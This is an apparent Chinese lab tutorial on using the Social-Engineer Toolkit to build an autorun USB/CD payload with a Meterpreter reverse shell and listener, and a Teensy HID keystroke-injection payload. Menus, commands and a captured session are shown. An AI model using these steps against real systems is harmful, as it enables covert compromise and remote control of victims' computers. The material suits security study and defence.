1.传染性媒体生成器是一个简单的攻击向量,可以烧到CD/DVD上或放到USB驱动器上
具体生成方法如下:
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 3
The Infectious USB/CD/DVD module will create an autorun.inf file and a
Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
run if autorun is enabled.
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
1) File-Format Exploits
2) Standard Metasploit Executable
99) Return to Main Menu
set:infectious>2
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
8) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
9) Download/Run your Own Executable Downloads an executable and runs it
set:payloads>2
set:payloads> IP address for the payload listener (LHOST):192.168.1.113
set:payloads> Enter the PORT for the reverse listener:443
[*] Generating the payload.. please be patient.
[*] Payload has been exported to the default SET directory located under: /root/.set/payload.exe
[*] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
set> Create a listener right now [yes|no]: yes
[*] Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..
[!] The following modules could not be loaded!..-
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /root/.msf4/logs/framework.log for details.
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.0.43-dev ]
+ -- --=[ 2129 exploits - 1137 auxiliary - 363 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/.set/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.113
LHOST => 192.168.1.113
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:443
msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1604) at 2021-06-22 21:31:43 +0800
如图所示保存到root/.set内,打开另外一个命令行将攻击向量拷贝到想要的地方
┌──(root💀kali)-[~]
└─# cd /
┌──(root💀kali)-[/]
└─# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
┌──(root💀kali)-[/]
└─# cd root/.set
┌──(root💀kali)-[~/.set]
└─# ls
autorun meta_config payload.exe payloadgen set.options
2.USB HID攻击,定制化硬件和通过键盘模拟绕过限制性攻击技术的结合,当usb或cd、dvd插入电脑后,autorun.inf会自动运行,但是当播放结束后,就不能执行。然而,利用usb uid 能够模拟键盘和鼠标,当插入这个设备时,可以发送一串键盘命令,进而完全控制
具体过程如下:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 6
The Arduino-Based Attack Vector utilizes the Arduin-based device to
program the device. You can leverage the Teensy's, which have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Special thanks to: IronGeek, WinFang, and Garland
This attack vector also attacks X10 based controllers, be sure to be leveraging
X10 based communication devices in order for this to work.
Select a payload to create the pde file to import into Arduino:
1) Powershell HTTP GET MSF Payload
2) WSCRIPT HTTP GET MSF Payload
3) Powershell based Reverse Shell Payload
4) Internet Explorer/FireFox Beef Jack Payload
5) Go to malicious java site and accept applet Payload
6) Gnome wget Download Payload
7) Binary 2 Teensy Attack (Deploy MSF payloads)
8) SDCard 2 Teensy Attack (Deploy Any EXE)
9) SDCard 2 Teensy Attack (Deploy on OSX)
10) X10 Arduino Sniffer PDE and Libraries
11) X10 Arduino Jammer PDE and Libraries
12) Powershell Direct ShellCode Teensy Attack
13) Peensy Multi Attack Dip Switch + SDCard Attack
14) HID Msbuild compile to memory Shellcode Attack
99) Return to Main Menu
set:arduino>1
set> Do you want to create a payload and listener [yes|no]: : yes
What payload do you want to generate:
Name: Description:
1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection
2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection
3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec
7) Import your own executable Specify a path for your own executable
8) Import your own commands.txt Specify payloads to be sent via command line
set:payloads>1
set:payloads> PORT of the listener [443]:
Select the payload you want to deliver via shellcode injection
1) Windows Meterpreter Reverse TCP
2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
4) Windows Meterpreter (ALL PORTS) Reverse TCP
set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] INO file created. You can get it under '/root/.set/reportsteensy_2021-06-22 21:43:59.407019.ino'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare
Press {return} to continue.
根据提示,文件保存在.set文件夹内,查看并烧录到Arduino内
┌──(root💀kali)-[~/.set]
└─# cd reports
┌──(root💀kali)-[~/.set/reports]
└─# ls
'teensy_2021-06-22 21:42:48.689485.ino' 'teensy_2021-06-22 21:48:06.725690.ino'
'teensy_2021-06-22 21:43:59.407019.ino' 'teensy_2021-06-22 21:48:19.651537.ino'
本文详细介绍了使用set工具包生成传染性媒体攻击向量和USB HID攻击向量,仅供学习
846
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
